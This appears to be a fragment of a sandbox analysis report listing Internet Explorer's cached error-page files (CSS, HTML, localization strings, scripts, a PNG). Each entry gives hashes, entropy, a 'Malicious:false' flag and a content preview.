                            Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\NewErrorPageTemplate[1]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):1612
                            Entropy (8bit):4.869554560514657
                            Encrypted:false
                            SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                            MD5:DFEABDE84792228093A5A270352395B6
                            SHA1:E41258C9576721025926326F76063C2305586F76
                            SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                            SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                            Malicious:false
                            Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\NewErrorPageTemplate[2]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):1612
                            Entropy (8bit):4.869554560514657
                            Encrypted:false
                            SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                            MD5:DFEABDE84792228093A5A270352395B6
                            SHA1:E41258C9576721025926326F76063C2305586F76
                            SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                            SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                            Malicious:false
                            Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\dnserror[1]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):2997
                            Entropy (8bit):4.4885437940628465
                            Encrypted:false
                            SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                            MD5:2DC61EB461DA1436F5D22BCE51425660
                            SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                            SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                            SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                            Malicious:false
                            Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\errorPageStrings[1]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):4720
                            Entropy (8bit):5.164796203267696
                            Encrypted:false
                            SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                            MD5:D65EC06F21C379C87040B83CC1ABAC6B
                            SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                            SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                            SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                            Malicious:false
                            Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\errorPageStrings[2]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):4720
                            Entropy (8bit):5.164796203267696
                            Encrypted:false
                            SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                            MD5:D65EC06F21C379C87040B83CC1ABAC6B
                            SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                            SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                            SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                            Malicious:false
                            Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\httpErrorPagesScripts[1]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):12105
                            Entropy (8bit):5.451485481468043
                            Encrypted:false
                            SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                            MD5:9234071287E637F85D721463C488704C
                            SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                            SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                            SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                            Malicious:false
                            Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\httpErrorPagesScripts[2]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):12105
                            Entropy (8bit):5.451485481468043
                            Encrypted:false
                            SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                            MD5:9234071287E637F85D721463C488704C
                            SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                            SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                            SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                            Malicious:false
                            Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\httpErrorPagesScripts[3]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):12105
                            Entropy (8bit):5.451485481468043
                            Encrypted:false
                            SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                            MD5:9234071287E637F85D721463C488704C
                            SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                            SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                            SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                            Malicious:false
                            Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\NewErrorPageTemplate[1]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):1612
                            Entropy (8bit):4.869554560514657
                            Encrypted:false
                            SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                            MD5:DFEABDE84792228093A5A270352395B6
                            SHA1:E41258C9576721025926326F76063C2305586F76
                            SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                            SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                            Malicious:false
                            Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\NewErrorPageTemplate[2]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):1612
                            Entropy (8bit):4.869554560514657
                            Encrypted:false
                            SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                            MD5:DFEABDE84792228093A5A270352395B6
                            SHA1:E41258C9576721025926326F76063C2305586F76
                            SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                            SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                            Malicious:false
                            Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\NewErrorPageTemplate[3]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):1612
                            Entropy (8bit):4.869554560514657
                            Encrypted:false
                            SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                            MD5:DFEABDE84792228093A5A270352395B6
                            SHA1:E41258C9576721025926326F76063C2305586F76
                            SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                            SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                            Malicious:false
                            Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\dnserror[1]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):2997
                            Entropy (8bit):4.4885437940628465
                            Encrypted:false
                            SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                            MD5:2DC61EB461DA1436F5D22BCE51425660
                            SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                            SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                            SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                            Malicious:false
                            Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\dnserror[2]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):2997
                            Entropy (8bit):4.4885437940628465
                            Encrypted:false
                            SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                            MD5:2DC61EB461DA1436F5D22BCE51425660
                            SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                            SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                            SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                            Malicious:false
                            Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\down[1]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                            Category:dropped
                            Size (bytes):748
                            Entropy (8bit):7.249606135668305
                            Encrypted:false
                            SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                            MD5:C4F558C4C8B56858F15C09037CD6625A
                            SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                            SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                            SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                            Malicious:false
                            Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\errorPageStrings[1]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):4720
                            Entropy (8bit):5.164796203267696
                            Encrypted:false
                            SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                            MD5:D65EC06F21C379C87040B83CC1ABAC6B
                            SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                            SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                            SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                            Malicious:false
                            Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\httpErrorPagesScripts[1]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):12105
                            Entropy (8bit):5.451485481468043
                            Encrypted:false
                            SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                            MD5:9234071287E637F85D721463C488704C
                            SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                            SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                            SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                            Malicious:false
                            Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\httpErrorPagesScripts[2]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
